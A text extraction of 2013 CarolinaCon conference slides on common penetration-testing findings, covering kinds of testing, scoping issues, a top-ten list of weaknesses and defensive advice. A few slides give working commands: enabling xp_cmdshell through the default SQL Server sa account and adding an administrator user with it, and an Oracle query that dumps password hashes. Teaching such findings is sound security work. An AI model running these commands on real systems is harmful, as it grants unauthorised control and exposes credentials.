CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller.

CarolinaCon 9

The Low Hanging Fruit of Penetration Testing

Presented by:

Bryan Miller

CarolinaCon 9

Pen Testing vs. VA vs. Risk Assessments

Penetration Testing Concepts/Issues

What is Low Hanging Fruit

Low Hanging Fruit Examples

Wrap Up

3/16/2013

The Low Hanging Fruit of Penetration Testing 2

AGENDA

CarolinaCon 9

B.S. I.S., M.S. C.S. – Virginia Commonwealth University

Current CISSP, former Banyan CBE & Cisco CCIE

Former adjunct professor – I.S. & C.S. – VCU

ISSA, ISACA, IALR and VA SCAN lecturer

Penetration testing for 11+ years

Published author with 25 years in I.T.

3/16/2013


CarolinaCon 9

3/16/2013


Penetration Testingvs.

Vulnerability Assessmentsvs.

Risk Assessments

4

CarolinaCon 9

Penetration Testing Tests for actual vulnerabilities and what can be

exploited Value add comes from putting the pieces together

Vulnerability Assessment Reports on potential vulnerabilities without testing them Assigns risk values to each issue

Risk Assessment More analytical and less technical Great for overviews but IMHO it will never catch LHF

3/16/2013


CarolinaCon 9

3/16/2013


Penetration Testing Concepts/Issues

6

CarolinaCon 9

Types of testing

External Testing from outside the security perimeter (firewall)

Internet, dial-in, wireless, physical & social engineering

Usually performed in a black-box approach w/no credentials

3/16/2013


CarolinaCon 9

Types of testing

Internal What is accessible inside the security perimeter

White-box or black-box depending on goals Tests for effects of automated malicious software

3/16/2013


CarolinaCon 9

Issues - Requirements definition

Do you need a penetration test, VA or risk assessment? Sometimes you may need more than one

What is the ultimate goal of the test? Physical → Test security cameras, locks and alarms Social Engineering → Test HR policies and procedures Vulnerability Assessment → Patch scan

How do you define success? How do you know if the test succeeded or failed? Sometimes difficult to define for a penetration test

3/16/2013


CarolinaCon 9

Issues - In-house or outsourced?

In-house Keeping qualified staff happy is a tough job Tools and training can be very expensive Sometimes you just need an unbiased 2nd opinion

Outsourced How do you judge competency? Do they have a methodology, tool list, references? Do they outsource their work? Geography/vertical market coverage

3/16/2013


CarolinaCon 9

Issues

Deliverables Will the report include specific recommendations? Is there tool output for verification? No boilerplate text!

Remediation If you don’t plan on fixing the issues, don’t waste the time

or money performing the tests

Post-remediation testing Critical to ensure that all issues have been resolved

3/16/2013


CarolinaCon 9

3/16/2013


What is Low Hanging Fruit?

12

CarolinaCon 9

The Low Hanging Fruit Top Ten

6. Permissions on data resources

7. Employee security awareness

8. Encryption

9. Policies & procedures

10. Physical security

3/16/2013


CarolinaCon 9

The Low Hanging Fruit Top Ten

1. Password management

2. Default security controls

3. OS and application patches

4. SQL Injection, XSS, URL issues

5. Wireless access points/modems

3/16/2013


CarolinaCon 9

3/16/2013


Low Hanging Fruit Examples

15

CarolinaCon 9

3/16/2013


CarolinaCon 9

Turn on “xp_cmdshell” if it’s disabled

1. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1"

2. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"3. osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE

master.dbo.sp_configure ‘xp_cmdshell’, 1"4. osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE"

Fun with Microsoft SQL

3/16/2013


CarolinaCon 9

Add administrative user

1. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'"

2. osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'"

More Fun with Microsoft SQL

3/16/2013


CarolinaCon 9

3/16/2013


TheTrouble

withVNC

CarolinaCon 9

There are many ways to get the VNC password hashes…

3/16/2013


CarolinaCon 9

3/16/2013


CarolinaCon 9

Dumping password hashes – non-privileged account

1. Logged in as “dbsnmp”, we ran the following query:

select username, password from dba_users;

DBSNMP AE1E40C725DFCAC8 AQADMIN 739EF27E22AC39DC SYS C10A280B9CFF9A72 SYSTEM 04D19DEFD642AF20

Fun with Oracle

3/16/2013


CarolinaCon 9

2. Ran CheckPWD:

3/16/2013


CarolinaCon 9

3/16/2013


Reboot via Compaq Insight Manager (CIM)

CarolinaCon 9

3/16/2013


CarolinaCon 9

3/16/2013


Appliances are not immune….

CarolinaCon 9

3/16/2013


Downloaded passwd, shadow, host files

CarolinaCon 9

3/16/2013


CarolinaCon 9

3/16/2013


Looks like we can

request any file?

CarolinaCon 9

3/16/2013


OK, we’ll

ask for the

password file.

Next up, JTR!

CarolinaCon 9

3/16/2013


This is why PCI doesn’t allow WEP

CarolinaCon 9

3/16/2013


What the fake telephone repairman saw…

CarolinaCon 9

3/16/2013


The danger of scripts laying around…

CarolinaCon 9

3/16/2013


Wrap-Up

50

CarolinaCon 9

Data breaches affect your organization’s reputation and can cost you money.

Software is becoming more complex while attacker tools are becoming easier to use.

Data breaches can be reduced by following best practice rules to eliminate LHF.

3/16/2013


CarolinaCon 9

Remember the 3 P’s:

Policies & Procedures

Password Management

Patching

3/16/2013


CarolinaCon 9

3/16/2013


Q&ABryan Miller

[email protected]

CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller.

Documents

Transcript of CarolinaCon 9 The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller.